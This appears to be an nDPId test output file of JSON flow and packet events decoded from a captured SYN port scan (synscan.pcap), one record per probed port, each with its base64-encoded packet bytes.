+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsKoIAACkG9PCsEAAIQA2GNIzSAirdUoMYAAAAAGACCAAuZQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsVR8AACsGyFOsEAAIQA2GNIzSAIfdUoMYAAAAAGACEAAoCAAAAgQFtA=="} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs1DEAADAGREGsEAAIQA2GNIzSABbdUoMYAAAAAGACBAA0eQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs1H4AADMGQPSsEAAIQA2GNIzSIrjdUoMYAAAAAGACEAAF1wAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs0TgAACYGUTqsEAAIQA2GNIzSAiTdUoMYAAAAAGACDAAqawAAAgQFtA=="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1278275057740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275057740,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAAWjNIpZyOl3VKDGWASFtDU2wAAAgQFZAAA"} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1278275057740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275057740,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACAAZjNIefGtp3VKDGVAUAADGOQAAAAAAAAAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAseeEAACgGppGsEAAIQA2GNIzSBCDdUoMYAAAAAGACBAAwbwAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsRVMAACsG2B+sEAAIQA2GNIzSKYXdUoMYAAAAAGACEAD\/CQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsRm4AADAG0gSsEAAIQA2GNIzSCi3dUoMYAAAAAGACBAAqYgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsnToAADAGezisEAAIQA2GNIzSKX3dUoMYAAAAAGACBAALEgAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAskEcAADcGgSusEAAIQA2GNIzSA97dUoMYAAAAAGACEAAksQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAs0R4AADcGQFSsEAAIQA2GNIzSFSbdUoMYAAAAAGACEAATaQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsbqYAACwGrcysEAAIQA2GNIzSCK7dUoMYAAAAAGACBAAr4QAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsJyoAADQG7UisEAAIQA2GNIzSF3DdUoMYAAAAAGACBAAdHwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsfqQAACwGnc6sEAAIQA2GNIzSBpfdUoMYAAAAAGACBAAt+AAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAskxYAACsGilysEAAIQA2GNIzSBNHdUoMYAAAAAGACEAAjvgAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsCEIAADAGEDGsEAAIQA2GNIzSB+7dUoMYAAAAAGACBAAsoQAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAszJQAADoGQd6sEAAIQA2GNIzSAAbdUoMYAAAAAGACDAAsiQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsqb4AACYGeLSsEAAIQA2GNIzSBYndUoMYAAAAAGACDAAnBgAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsNw4AADUG3GSsEAAIQA2GNIzSIB7dUoMYAAAAAGACCAAQcQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsOZAAACUG6eKsEAAIQA2GNIzSAqvdUoMYAAAAAGACCAAt5AAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsX3cAADcGsfusEAAIQA2GNIzSC+rdUoMYAAAAAGACEAAcpQAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsRPgAADsGyHqsEAAIQA2GNIzTAiTdU4MZAAAAAGACEAAmaAAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsCYQAACgGFu+sEAAIQA2GNIzTIrjdU4MZAAAAAGACBAAR1AAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsS98AACoG0pOsEAAIQA2GNIzTAIfdU4MZAAAAAGACDAAsBQAAAgQFtA=="} 